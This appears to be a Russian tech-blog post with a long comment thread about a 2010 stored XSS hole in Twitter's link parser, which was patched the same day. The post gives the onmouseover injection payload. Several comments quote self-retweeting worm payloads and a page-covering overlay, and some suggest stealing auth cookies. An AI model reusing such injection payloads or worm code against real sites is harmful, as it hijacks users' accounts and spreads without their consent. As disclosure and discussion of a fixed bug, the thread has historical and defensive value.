Активная XSS на Twitter

    Скриншот (спасибо lc0d3r):

    image
    Пример: twitter.com/mr_the/status/25105420721 (там только alert)

    Началось всё отсюда (банальное раскрашивание через css) twitter.com/RainbowTwtr, автор не известен.

    Достаточно отпостить твитт вида:
    http://twitter.com/mr_the#@"onmouseover="jAvascript:alert('Ha-ha! XSS!');"/
    
    и будет много-много радости.

    Собственно причина — плохой парсер ссылок, без должной фильтрации.

    В целях безопасности, рекомендую временно отключить выполнение JavaScript на twitter.com.

    UPD: В NewTwitter xss не работает.
    UPD2: На 15:52 (по Киеву) закрыли возможность отправлять подобные твитты. Старые всё ещё работают.
    UPD3: 16:46 по Киеву, уязвимость официально закрыли — status.twitter.com/post/1161435117/xss-attack-identified-and-patched
    Ads
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More

    Comments 105

      +2
      Молодец!

      Фильтруйте все данные приходящие от пользователя!!!
        +1
        В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
          0
          Мне вот такую штуку послали (пробел после http надо убрать):

          http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
          +1
          Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)

          Кстати, так можно спастить от бага до офф. фикса
            +3
            Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
              +1
              А у кого?
                +2
                У избранных великим рандомом! Во всяком случае, в моей ленте новый твиттер может включить всего несколько человек, включая меня.
                  0
                  А как ты его включаешь? Через настройки?
                0
                А как вообще узнать, есть у меня эта возможность, или нет?
                  +7
                  Сверху появится вот такая кнопочка:
                    +1
                    Может, если подделать кнопочку у себя, она и у других включится?
                      0
                      Проверяли уже — не включается. По клику идёт вот такое обращение: twitter.com/account/use_phx?setting=true
                      Попробуйте, вдруг получится.
                        0
                        Все-таки нет. Ничего, скоро и на нашей улице будет праздник.
                          0
                          А у меня сработало и включилось. Спасибо!
                          Предложения как на скриншоте выше у меня не было.
                            +2
                            Кстати, у меня это предложение блокировал один из плагинов)
                        0
                        Понятно, спасибо!
                  +7
                  хреноватенькие тестеры у них
                    0
                    Им походу нужно форсировать распространение новой версии. Если она так долго по серверам ползет, как долго будет распространяться фикс?
                    +1
                    А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
                      –1
                      сморя че в них хранится
                        0
                        Авторизация хранится. Можно зайти под чужим аккаунтом, подменив куки.
                        +3
                        некоторые сайты используют для авторизации твиттеровский OAuth
                        0
                        Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
                          0
                          Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
                            +2
                            Значит кто-то из тех кого вы фолловите ретвитнул сообщения RainbowTwtr, а потом нажал Undo
                            +3
                            twitter.com/biophreak у меня теперь настоящий коммунистический твиттер (:
                              +1
                              А теперь то же самое с хеш-тегом, например #prinsjesdag
                                0
                                с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
                                Можете попробовать, если че:
                                twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
                              0
                              Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
                                +12

                                Переходим на CSS3 ;-)
                                  +17
                                  Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
                                    +1
                                    меньше, там еще ссылка, собачка, решетка, и мелочи всякие (:
                                    0
                                    возвращаемся к временам ASM, приложение в минимальном количестве символов )
                                      0
                                      Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
                                        +2
                                        символов и так мало ))
                                        0
                                        Noscript как бе говорит «пофигу» ))
                                        • UFO just landed and posted this here
                                            +2
                                            всё, черви пошли. не ходите на вебморду
                                              +6
                                              Twi-вирус:
                                              http: //a.no/@"onmouseover=";$('textarea:first').val
                                              (this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
                                                0
                                                Аха, уже вся лента забита. Прикольно.
                                                +1
                                                Мне пришел авторетвит: habreffect.ru/files/ba1/06e3909e1/rt.png
                                                Наводишь мышку и автоматом ретвитишь.
                                                  0
                                                  А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
                                                    0
                                                    хм…
                                                      0
                                                      просто в таком случае можно-же будет вешать события не на mouseover, а, скажем на mousemove и так далее
                                                        0
                                                        ссылка выше на twitter.com/superbacker у него есть такие попытки, наводить проверять не стал )))
                                                          0
                                                          Ха, работает… бугагашенька…
                                                        +1
                                                        Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
                                                          0
                                                          ну когда еще такое будет… ща наиграются все и надоест )
                                                            +1
                                                            это же старая дырка… там клиент не фильтровался вроде.
                                                              0
                                                              Это старая уязвимость.
                                                            • UFO just landed and posted this here
                                                                –1
                                                                это не акк балуется, а твивирус распространется.
                                                                • UFO just landed and posted this here
                                                                –1
                                                                А какой командой удаляются аккаунты? :)
                                                                  0
                                                                  Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
                                                                    +1
                                                                    Хватит во зло использовать, смотрите и радуйтесь: twitter.com/myfreeweb/statuses/25112218506
                                                                    +1
                                                                    В ленте пипец просто настал.
                                                                    Спас Firebug…
                                                                      –5
                                                                      Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:



                                                                      А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
                                                                        +6
                                                                        крупная компания грешит ламерством
                                                                          –2
                                                                          Это весьма заметно. Сообщение больше 10 минут не удалялось, да и почти одновременно последовавший ретвит несколько другого сообщения от самого Цыплухина как бы намекает. Понабирали по объявлениям…
                                                                          0
                                                                          Дуров, кто-же еще =)
                                                                            +9
                                                                            Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
                                                                              +3
                                                                              так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
                                                                                0
                                                                                Хотите сказать, что Вконтакте преднамеренно это сделала?
                                                                                  –1
                                                                                  За менее чем десять минут можно было сообщение удалить? Вроде как люди не совсем далекие от темы, должны были сообразить что это значит.
                                                                                0
                                                                                Попался два раза на авторетвите. Firebug помог.
                                                                                А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
                                                                                  0
                                                                                  «В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
                                                                                  Твиттер без скрипта не работает.
                                                                                    0
                                                                                    В целях безопасности сейчас лучше всего использовать внешние клиенты.
                                                                                      0
                                                                                      Вся лента теперь в этих отправлениях.
                                                                                      • UFO just landed and posted this here
                                                                                          +5
                                                                                          новая твиттер версия упячка
                                                                                          0
                                                                                          Всё, уже вылечили.

                                                                                          Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
                                                                                          http:\u002f\u002fis.gd\u002ffl9A7
                                                                                          0
                                                                                          <script language="javascript">
                                                                                          	document.write('http:\u002f\u002fis.gd\u002ffl5d3')
                                                                                          </script>
                                                                                            +1
                                                                                            сорри, это был ответ на сообщение EvgeniyLazarev
                                                                                            0
                                                                                              0
                                                                                              Что оно делает?
                                                                                              –4
                                                                                              уже достало говорить что пора юзать dabr.co.uk или sexymonday.ru/dabr
                                                                                                +4
                                                                                                уже достало
                                                                                                +3
                                                                                                Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
                                                                                                  +1
                                                                                                  0
                                                                                                  Ну вот и пофиксили
                                                                                                    +5
                                                                                                    Ждём, когда @KremlinRussia ретвитнет радугу :)
                                                                                                      0
                                                                                                      или @KermlinRussia :)
                                                                                                    • UFO just landed and posted this here
                                                                                                        +6
                                                                                                        Почему до сих пор нет Властелина?
                                                                                                          0
                                                                                                          @ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
                                                                                                          • UFO just landed and posted this here
                                                                                                            • UFO just landed and posted this here
                                                                                                                0
                                                                                                                Это не они, это скрипт сам рассылает эти твиты. Ретвитит сам себя и так распространяется.
                                                                                                                +1
                                                                                                                Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
                                                                                                                  0
                                                                                                                  У меня тоже браузер сам сделал ретвит кода, ретвитов 100+. при этом home, странно себя ведет, делает редирект на direct messages.
                                                                                                                    0
                                                                                                                    Вот, это и я зацепил.
                                                                                                                  +1
                                                                                                                  Я просто оставлю это здесь:
                                                                                                                  mobile.twitter.com/
                                                                                                                  • UFO just landed and posted this here
                                                                                                                    +1
                                                                                                                    Я горжусь, что меня фолловит @mr_the :D
                                                                                                                      +2
                                                                                                                      Пофиксили. Расходимся (:
                                                                                                                        –7
                                                                                                                        кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
                                                                                                                          +1
                                                                                                                          А у меня после всех этих забав, главная твиттера выглядит вот так,

                                                                                                                          Only users with full accounts can post comments. Log in, please.